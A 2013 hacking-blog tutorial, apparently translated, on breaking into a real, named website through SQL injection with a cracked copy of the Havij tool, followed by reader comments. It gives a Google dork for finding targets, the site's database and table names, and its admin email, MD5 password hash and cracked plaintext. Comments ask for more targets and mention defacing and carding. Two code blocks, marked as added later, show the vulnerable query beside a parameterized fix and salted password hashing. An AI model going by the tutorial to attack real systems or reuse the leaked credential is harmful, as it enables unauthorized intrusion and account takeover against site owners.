LinuxSec Exploit

Nothing is Ever Locked

SQL Injection Tutorial Using the Havij Tool

February 19, 2013 by Jack Wilder 53 Comments

Yesterday I shared the Havij 1.15 Pro version [Cracked] tool. This time I will show how to use Havij to find a target website's password through SQLi.
Okay, let's get straight into it:

First, find a target with a Google dork.

Google Dork: inurl:"pages.php?id="

Then we pick one of the targets. For this experiment, I chose: http://www.radiesse-voice.com/pages.php?id=15

Enter that address into the Target field in Havij and click Analyze. Wait until the bottom panel reads Status: I'm IDLE

We then get the following data:

Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse
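
The "Injection type is Integer" line above means the id value reaches the SQL statement unquoted and unvalidated. The following is an added example, not code from the original post or from the site: it shows that flaw next to the fix (validate the integer, then bind it as a parameter). It uses Python's sqlite3 in place of PHP/MySQL; the table name rad_page comes from the post, while the columns, rows and function names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's page table (sample rows only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE rad_page (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO rad_page VALUES (?, ?)",
        [(14, "Contact"), (15, "Billing"), (16, "News")],
    )
    return db


def get_page_vulnerable(db, raw_id):
    # The request value is pasted into the statement, so the database
    # parses whatever follows the number as SQL. The value sits outside
    # any quotes, so quote-escaping alone would not have helped.
    return db.execute(
        "SELECT id, title FROM rad_page WHERE id = " + raw_id
    ).fetchall()


def get_page_bound(db, raw_id):
    # Bound parameter: the value is sent as data and never parsed as SQL.
    return db.execute(
        "SELECT id, title FROM rad_page WHERE id = ?", (raw_id,)
    ).fetchall()


def get_page_safe(db, raw_id):
    # Validate first (ASCII digits only), then bind the integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return get_page_bound(db, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    crafted = "15 OR 1=1"  # constructed input that changes the WHERE clause
    print(get_page_vulnerable(db, "15"))     # one row, as intended
    print(get_page_vulnerable(db, crafted))  # every row: query was rewritten
    print(get_page_bound(db, crafted))       # no rows: compared as a value
    try:
        get_page_safe(db, crafted)
    except ValueError as exc:
        print("rejected:", exc)
```
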

Okay, on to step 2: click Tables, then click Get Tables

New entries appear, namely the tables rad_admin, rad_news and rad_page. Since we are looking for admin access, we try rad_admin. Tick rad_admin, then click Get Columns

When it finishes, look at the bottom panel. We get the following data:

Data Found: admin_id,admin_email,admin_pass=1^admin@radiesse.com^f97c5d29941bfb1b2fdab0874906ab82

Okay, almost there. We found the columns: admin_id, admin_email, admin_pass, admin_passo
Let's look at the contents of admin_id, admin_email and admin_pass. Tick admin_id, admin_email and admin_pass, then click Get Data

Admin ID : 1
Admin Email : admin@radiesse.com
Admin Password : f97c5d29941bfb1b2fdab0874906ab82

However, the password is still an MD5 hash, so we recover the plaintext using Havij's MD5 feature.
We get the following result: Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one. So the password is one.
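
The lookup above works because admin_pass holds an unsalted MD5 digest: the same password always produces the same digest, so a precomputed table maps it straight back to the plaintext. The following is an added example, not code from the original post or from the site. It contrasts that storage with a salted, slow derivation (PBKDF2-HMAC-SHA256); the iteration count, the salt$hash storage format and all function names are assumptions made for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: work factor chosen for this example


def md5_unsalted(password):
    # Weak scheme as seen in admin_pass: fast, deterministic, no salt.
    return hashlib.md5(password.encode()).hexdigest()


def lookup_table(wordlist):
    # One precomputed table serves every account, because identical
    # passwords always yield identical unsalted digests.
    return {md5_unsalted(word): word for word in wordlist}


def hash_password(password, salt=None):
    # Per-user random salt plus a slow KDF: a precomputed table no longer
    # applies and each guess costs ITERATIONS hash computations.
    salt = salt or os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + derived.hex()


def verify_password(password, stored):
    salt_hex, derived_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS
    )
    # Constant-time comparison of the derived values.
    return hmac.compare_digest(candidate.hex(), derived_hex)


if __name__ == "__main__":
    words = ["one", "two", "three"]  # constructed sample wordlist
    table = lookup_table(words)
    print(table[md5_unsalted("two")])        # unsalted digest maps back
    first, second = hash_password("two"), hash_password("two")
    print(first != second)                   # salts make the records differ
    print(verify_password("two", first))     # correct password still verifies
```
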
At this point everything is done. All that remains is to find the admin login. Since that takes a long time, find the admin login yourselves. Use the Find Admin feature.
Okay, that's it for this tutorial. Good luck trying it.

Filed Under: SQL Injection Tagged With: Hacking

Comments

  1. Naufal Hanif Rabbani says

    February 19, 2013 at 8:59 pm

    Cool, bro 🙂

    • chiaki says

      February 19, 2013 at 10:30 pm

      Thanks, friend. . .

    • ilham bagus says

      September 24, 2013 at 1:20 pm

      Does it have to have pages.php?id=15, bro???

  2. BlogS of Hariyanto says

    February 19, 2013 at 10:11 pm

    Wow… once again all I can do is sit back and try to follow what is written here 🙂

    • chiaki says

      February 19, 2013 at 10:30 pm

      Okay, buddy. . .

  3. putra says

    February 19, 2013 at 11:41 pm

    This must be from that forum .. heheh… because I came across something like this the other day 😀

    • chiaki says

      February 20, 2013 at 12:56 am

      This one is on every forum. It's the basics. Hehehe

  4. Alt-Amiend says

    February 20, 2013 at 12:38 am

    Dropping by to say good morning, friend….

    • chiaki says

      February 21, 2013 at 12:12 am

      Thanks, friend. . .

  5. Imtikhan.Com says

    February 20, 2013 at 1:25 am

    Worth studying, bro
    Mind if I save this? 🙂

    • chiaki says

      February 20, 2013 at 9:44 am

      Sure, friend. . .

  6. Masnady says

    February 20, 2013 at 2:46 am

    Well, I'll just show my support, buddy; I still don't understand this kind of thing.. later, once I've bought a computer, I'll ask you to teach me this..

    you'd better not refuse to teach me, hahahahahahaha

    • chiaki says

      February 20, 2013 at 3:51 am

      :v

  7. Brebes VS Lamongan says

    February 20, 2013 at 3:45 am

    Good morning, just following along, bro, since I don't have the program yet, hehehe

    • chiaki says

      February 20, 2013 at 9:45 am

      It's in the previous article. :v

  8. budi os 19 says

    February 20, 2013 at 5:23 am

    Awesome, buddy… thanks for the info 🙂
    keep it up… hehe

    • chiaki says

      February 20, 2013 at 9:44 am

      Thanks, friend. . .

  9. Rohis Facebook says

    February 20, 2013 at 5:36 am

    Oh wow.., really thorough, bro… *smile

    • chiaki says

      February 20, 2013 at 9:43 am

      :v

  10. Bung Penho says

    February 20, 2013 at 4:04 pm

    Wow, this is getting more confusing, Yud. But it's good as a new lesson!

    • chiaki says

      February 21, 2013 at 12:12 am

      Hehehe. This is only the basics.

  11. Lanonadio says

    February 21, 2013 at 1:26 pm

    My head is spinning, man, I swear, hehehe

    • chiaki says

      February 22, 2013 at 12:59 am

      :v

    • Ipnul Haq says

      September 20, 2015 at 2:04 am

      Bro, can I have your Gmail? So I can contact you about further carding tutorials, bro

  12. Ilmu Dunia dan Akhirat says

    April 3, 2013 at 1:18 am

    I'll try the deface first, bro.. 🙂

  13. Andika yuda pratama says

    April 30, 2013 at 4:38 am

    Bro, I've already got the password; where do I find the admin login page ???

    • chiaki says

      May 6, 2013 at 8:25 am

      Use an admin finder, bro

  14. Dedy muswar says

    May 4, 2013 at 3:32 pm

    When I encrypt the password it doesn't work, bro; the result still says hash

  15. Majalah Siantar says

    May 5, 2013 at 5:58 am

    Great, but not every website can be broken into

    • chiaki says

      May 6, 2013 at 8:26 am

      Who said all of them?

  16. Koh Lee Van Djocdja says

    May 10, 2013 at 11:11 am

    Keep going, uncle….. 🙂

  17. Sekedar Info says

    May 23, 2013 at 2:17 pm

    Where is the admin login, bro ????

    #god-level confusion here…

  18. Tiooo says

    June 28, 2013 at 4:41 pm

    How do you tell that a website can be hacked, admin?

  19. ~uchanet~ says

    July 9, 2013 at 12:45 am

    Bro, when it can't find the DB (unknown), what's usually the cause…

  20. Anonim says

    July 9, 2013 at 10:28 am

    MD5 hash, huh… the problem is when the password isn't in the hash :v

  21. Seftian says

    July 25, 2013 at 12:55 am

    Thanks, bro Yuyud..
    I'm Seftian.. from before..
    but it's cool.. respect, because this is explained in detail (y)

  22. Anonim says

    August 3, 2013 at 2:17 am

    Bro, how do you log in with the username?
    We only have the email

  23. Anonim says

    August 4, 2013 at 11:11 pm

    How much are you willing to pay, xixixixixixixixixi

  24. Anonim says

    September 18, 2013 at 9:25 am

    Copy-paste, bro
    source is listed :3

  25. optimizer jakarta says

    November 4, 2013 at 5:42 am

    Just testing 🙂

  26. Anonim says

    November 12, 2013 at 2:24 pm

    Please help: how do we find out the pages.php?id=15? I searched with the Google dork and found nothing, then I tried replacing it with another number and on analyze I get a 404 error. So how do we find out a website's php?id? Thanks in advance

  27. Anonim says

    November 13, 2013 at 3:45 am

    greattttt men

  28. Azmi Hauzan Hazairin says

    November 16, 2013 at 6:12 am

    Why do I get a MESSAGE

    "Component 'tabctl32.ocx' blablablablablablablablablablablablablablablablablablablablablablablablabla

    • shinta says

      January 22, 2014 at 4:01 am

      "Run as administrator", bro

  29. Mahfud says

    December 9, 2013 at 3:09 pm

    Bro, why does the first screenshot have red text saying madura ciber? Why don't the other images have it?

    Maybe you copy-pasted too

  30. Tilis Tiadi says

    December 10, 2013 at 7:42 am

    Bro, what does this /pages.php?id=15 mean?
    And how do you get it? Please guide me, bro. (newbie)

  31. Anonim says

    March 28, 2014 at 9:57 am

    F*ck you, you copy-pasted from someone else's website

    • chiaki says

      June 1, 2015 at 3:30 am

      Where did I copy-paste from, you dog? Answer me
